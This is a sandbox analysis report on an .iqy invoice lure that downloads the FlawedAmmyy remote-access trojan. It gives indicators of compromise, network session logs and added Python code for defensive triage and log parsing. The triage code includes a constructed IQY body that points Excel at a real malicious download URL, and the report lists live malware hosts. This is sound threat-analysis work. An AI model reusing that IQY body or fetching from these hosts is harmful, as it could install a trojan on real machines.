IQY File Downloads FlawedAmmyy RAT | Network
VTI SCORE: 100/100
Target: Windows 7 (SP1, 64-bit), MS Office 2016 (64-bit) | ms_office
Classification: Trojan, Dropper, Exploit, Downloader

ca0da220f7691059b3174b2de14bd41ddb96bf3f02a2824b2b8c103215c7403c (SHA256)

Sales invoice Z12_01 copy.iqy.iqy

Excel Document

Created at 2018-06-06 09:51:00

Notifications (2/2)

The overall sleep time of all monitored processes was truncated from "3 minutes, 21 seconds" to "2 seconds" to reveal dormant functionality.

Connection Overview

Contacted Hosts (2)

Hostname                         IP Address       Location            Protocols       Reputation Status    WHOIS Data
95.213.251.149, brembotembo.com  95.213.251.149   Russian Federation  HTTP, DNS, TCP  Has Blacklisted URL  Queried
-                                185.222.202.139  Ukraine             TCP             Unknown              Not Queried
Contacted URLs (3)

URL                              Categories  Names          HTTP Status Code      Reputation Status
http://brembotembo.com/load.dat  Malware     Mal/HTMLGen-A  -                     Blacklisted
brembotembo.com/1.dat            Malware     Mal/HTMLGen-A  HTTP_STATUS_OK (200)  Blacklisted
brembotembo.com/doc.xls          Malware     Mal/HTMLGen-A  HTTP_STATUS_OK (200)  Blacklisted
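An added example (not VMRay's code and not the sample's contents) of how a mail gateway or triage script could open an .iqy attachment like the one analysed here and raise findings against the indicators in the tables above. The IQY body, the function names and the blacklist set are assumptions; the report shows only that Excel's first request was GET /1.dat on brembotembo.com, not what the attachment contained.

```python
"""Triage an Excel Web Query (.iqy) attachment against this report's indicators.
Added example; not VMRay's code and not the sample's contents.  SAMPLE_IQY is
constructed: the report shows only that Excel's first request was
GET /1.dat on brembotembo.com, not the attachment body."""
from urllib.parse import urlsplit

# Indicators from the tables above: the query host, its resolved IP and the
# raw-TCP peer.
BLACKLISTED_HOSTS = {"brembotembo.com", "95.213.251.149", "185.222.202.139"}

# Constructed sample.  An IQY file is plain text: line 1 is the query type
# ("WEB"), line 2 the format version ("1"), line 3 the URL Excel fetches into
# the worksheet; optional key=value option lines may follow.
SAMPLE_IQY = (
    "WEB\r\n"
    "1\r\n"
    "http://brembotembo.com/1.dat\r\n"
    "\r\n"
    "Selection=EntirePage\r\n"
    "Formatting=None\r\n"
)


def parse_iqy(text: str) -> dict:
    """Return query type, version, URL and options; raise on anything but a WEB query."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        raise ValueError("not an Excel WEB query file")
    options = {}
    for ln in lines[3:]:
        key, sep, value = ln.partition("=")
        if sep:
            options[key.strip()] = value.strip()
    return {"type": lines[0], "version": lines[1], "url": lines[2], "options": options}


def assess(filename: str, text: str, blacklist=BLACKLISTED_HOSTS) -> list:
    """Findings a gateway or triage script would raise; an empty list means nothing flagged."""
    findings = []
    query = parse_iqy(text)
    parts = urlsplit(query["url"])
    host = (parts.hostname or "").lower()
    if parts.scheme != "https":
        findings.append("query URL is not HTTPS: " + query["url"])
    if host in blacklist:
        findings.append("query host is blacklisted: " + host)
    if host and all(c.isdigit() or c == "." for c in host):
        findings.append("query URL is a raw IPv4 address: " + host)
    # The attachment in this report is named "...copy.iqy.iqy"; a repeated
    # extension is a cheap but useful lure indicator.
    if filename.lower().split(".")[1:].count("iqy") > 1:
        findings.append("repeated .iqy extension on attachment name: " + filename)
    return findings


if __name__ == "__main__":
    for finding in assess("Sales invoice Z12_01 copy.iqy.iqy", SAMPLE_IQY):
        print(finding)
```

Excel shows a security prompt before running a web query and then writes whatever the server returns into the worksheet, so the 561-byte response to /1.dat in HTTP Session #1 below is the content Excel pulled into the sheet; the report does not show its body, and the example does not assume what it contained.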

Connections

DNS (1)

Operation     Additional Information                                Success  Count
Resolve Name  host = brembotembo.com, address_out = 95.213.251.149  True     1
TCP Sessions (1)

Information           Value
Total Data Sent       0.17 KB
Total Data Received   0.00 KB
Contacted Host Count  1
Contacted Hosts       185.222.202.139:80

TCP Session #1

Information     Value
Handle          0xf0
Address Family  AF_INET
Type            SOCK_STREAM
Protocol        IPPROTO_IP
Remote Address  185.222.202.139
Remote Port     80
Local Address   0.0.0.0
Local Port      49167
Data Sent       0.17 KB
Data Received   0.00 KB

Operation  Additional Information                                            Success  Count
Create     protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM  True     1
Connect    remote_address = 185.222.202.139, remote_port = 80                True     1
Send       flags = NO_FLAG_SET, size = 36, size_out = 36                     True     1
Receive    flags = NO_FLAG_SET, size = 2, size_out = 2                       True     1
Send       flags = NO_FLAG_SET, size = 131, size_out = 131                   True     1
Send       flags = NO_FLAG_SET, size = 2, size_out = 2                       True     1
Receive    flags = NO_FLAG_SET, size = 1, size_out = 1                       True     1

Note: this is a raw socket exchange on port 80 (Create/Connect/Send/Receive on an AF_INET stream socket), not an HTTP session; 36 + 131 + 2 = 169 bytes were sent and only 3 bytes came back, which is why the summary rounds the received total to 0.00 KB. The sandbox lists it separately from the three HTTP sessions to brembotembo.com that follow, and the peer 185.222.202.139 appears in no DNS lookup, so the address was carried in the payload rather than resolved by name.
HTTP Sessions (3)

Information           Value
Total Data Sent       0.29 KB
Total Data Received   424.80 KB
Contacted Host Count  1
Contacted Hosts       brembotembo.com

HTTP Session #1

Information    Value
Server Name    brembotembo.com
Server Port    80
Data Sent      0.07 KB
Data Received  0.55 KB

Operation          Additional Information                                                                                                  Success  Count
Open Session       access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS  True     1
Open Connection    protocol = http, server_name = brembotembo.com, server_port = 80                                                         True     1
Open HTTP Request  http_verb = GET, http_version = HTTP/1.1, target_resource = /1.dat                                                       True     1
Send HTTP Request  headers = host: brembotembo.com, connection: Keep-Alive, url = brembotembo.com/1.dat                                     True     1
Read Response      size = 4096, size_out = 561                                                                                              True     1

HTTP Session #2

Information    Value
Server Name    brembotembo.com
Server Port    80
Data Sent      0.05 KB
Data Received  174.25 KB

Operation          Additional Information                                                                                                  Success  Count
Open Session       access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS  True     1
Open Connection    protocol = http, server_name = brembotembo.com, server_port = 80                                                         True     1
Open HTTP Request  http_verb = GET, http_version = HTTP/1.1, target_resource = /doc.xls                                                     True     1
Send HTTP Request  headers = host: brembotembo.com, url = brembotembo.com/doc.xls                                                           True     1
Read Response      size = 4096, size_out = 1448                                                                                             True     1
Read Response      size = 65536, size_out = 11584                                                                                           True     1
Read Response      size = 65536, size_out = 65536                                                                                           True     1
Read Response      size = 65536, size_out = 21584                                                                                           True     1
Read Response      size = 65536, size_out = 63888                                                                                           True     1
Read Response      size = 14395, size_out = 5808                                                                                            True     1
Read Response      size = 8587, size_out = 1452                                                                                             True     1
Read Response      size = 7135, size_out = 1452                                                                                             True     1
Read Response      size = 5683, size_out = 5683                                                                                             True     1

HTTP Session #3

Information    Value
Server Name    brembotembo.com
Server Port    80
Data Sent      0.17 KB
Data Received  250.00 KB

Operation          Additional Information                                                                                                  Success  Count
Open Session       access_type = INTERNET_OPEN_TYPE_PRECONFIG                                                                               True     1
Open Connection    protocol = http, server_name = brembotembo.com, server_port = 80                                                         True     1
Open HTTP Request  http_verb = GET, http_version = HTTP 1.1, target_resource = /load.dat, flags = INTERNET_FLAG_RELOAD                      True     1
Send HTTP Request  headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://brembotembo.com/load.dat                                           True     1
Read Response      size = 1024, size_out = 1024                                                                                             True     250

Note: the per-session byte counts reconcile with the Read Response rows (561 bytes = 0.55 KB; the nine reads of session #2 sum to 178,435 bytes = 174.25 KB; 250 reads of 1,024 bytes = 256,000 bytes = 250.00 KB), and the three together give the 424.80 KB in the summary. Sessions #1 and #2 were opened through WinHTTP (WINHTTP_* constants, explicit Host and Keep-Alive headers), whereas session #3 was opened through WinINet (INTERNET_OPEN_TYPE_PRECONFIG, INTERNET_FLAG_RELOAD) with the system proxy configuration; a switch of HTTP stack mid-chain usually means a different component issued the last request, though the report does not name the process, so that remains an inference.
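Added example, not VMRay's code: a small parser over function-log rows in the shape of the operation tables above that reconstructs the download chain, the bytes read per session, and which HTTP API family opened each session. The rows are constructed from this report's three sessions; the tab-separated row layout and the function names are assumptions.

```python
"""Reconstruct the HTTP download chain from function-log rows shaped like the
operation tables in this report.  Added example (not VMRay's code); the row
layout (session, operation, additional information, count; tab-separated) is
an assumption."""

# Constructed rows copied from the three HTTP sessions above.  Session 3's
# 250 identical reads are one row with count 250, as the report shows them.
LOG_ROWS = [
    ("1", "Open Session", "access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME", "1"),
    ("1", "Open HTTP Request", "http_verb = GET, http_version = HTTP/1.1, target_resource = /1.dat", "1"),
    ("1", "Read Response", "size = 4096, size_out = 561", "1"),
    ("2", "Open Session", "access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME", "1"),
    ("2", "Open HTTP Request", "http_verb = GET, http_version = HTTP/1.1, target_resource = /doc.xls", "1"),
    ("2", "Read Response", "size = 4096, size_out = 1448", "1"),
    ("2", "Read Response", "size = 65536, size_out = 11584", "1"),
    ("2", "Read Response", "size = 65536, size_out = 65536", "1"),
    ("2", "Read Response", "size = 65536, size_out = 21584", "1"),
    ("2", "Read Response", "size = 65536, size_out = 63888", "1"),
    ("2", "Read Response", "size = 14395, size_out = 5808", "1"),
    ("2", "Read Response", "size = 8587, size_out = 1452", "1"),
    ("2", "Read Response", "size = 7135, size_out = 1452", "1"),
    ("2", "Read Response", "size = 5683, size_out = 5683", "1"),
    ("3", "Open Session", "access_type = INTERNET_OPEN_TYPE_PRECONFIG", "1"),
    ("3", "Open HTTP Request", "http_verb = GET, http_version = HTTP 1.1, target_resource = /load.dat, flags = INTERNET_FLAG_RELOAD", "1"),
    ("3", "Read Response", "size = 1024, size_out = 1024", "250"),
]
LOG = "\n".join("\t".join(row) for row in LOG_ROWS)


def _fields(info: str) -> dict:
    """Split 'a = b, c = d' into a dict; pieces without '=' are ignored."""
    out = {}
    for piece in info.split(","):
        key, sep, value = piece.partition("=")
        if sep:
            out[key.strip()] = value.strip()
    return out


def _api_family(access_type: str) -> str:
    # The constant prefix identifies which HTTP stack the sandbox hooked.
    if access_type.startswith("WINHTTP_"):
        return "WinHTTP"
    if access_type.startswith("INTERNET_"):
        return "WinINet"
    return "unknown"


def parse_sessions(log: str) -> list:
    """Return one dict per session, in first-seen order, with resource, API and bytes read."""
    sessions = {}
    for line in log.splitlines():
        if not line.strip():
            continue
        sid, op, info, count = line.split("\t")
        s = sessions.setdefault(sid, {"session": sid, "resource": None, "api": "unknown", "bytes": 0})
        fields = _fields(info)
        if op == "Open Session":
            s["api"] = _api_family(fields.get("access_type", ""))
        elif op == "Open HTTP Request":
            s["resource"] = fields.get("target_resource")
        elif op == "Read Response":
            # size is the buffer offered; size_out is what the call actually returned.
            s["bytes"] += int(fields["size_out"]) * int(count)
    return list(sessions.values())


def kb(n: int) -> str:
    """Format bytes the way the report's summary rows do (1 KB = 1024 bytes, two decimals)."""
    return "%.2f KB" % (n / 1024)


def summarize(sessions: list) -> dict:
    apis = sorted({s["api"] for s in sessions})
    return {
        "chain": [s["resource"] for s in sessions],
        "api_families": apis,
        "mixed_api": len(apis) > 1,  # a second HTTP stack usually means a second component
        "total_bytes": sum(s["bytes"] for s in sessions),
    }


if __name__ == "__main__":
    found = parse_sessions(LOG)
    for s in found:
        print(s["session"], s["api"], s["resource"], kb(s["bytes"]))
    print(summarize(found))
```

Run stand-alone it prints the chain /1.dat, /doc.xls, /load.dat with the same per-session KB figures as the report and flags the WinHTTP-to-WinINet switch; fed real function-log exports in the assumed layout, the same two functions give a quick first answer to "what was fetched, how much, and by which stack".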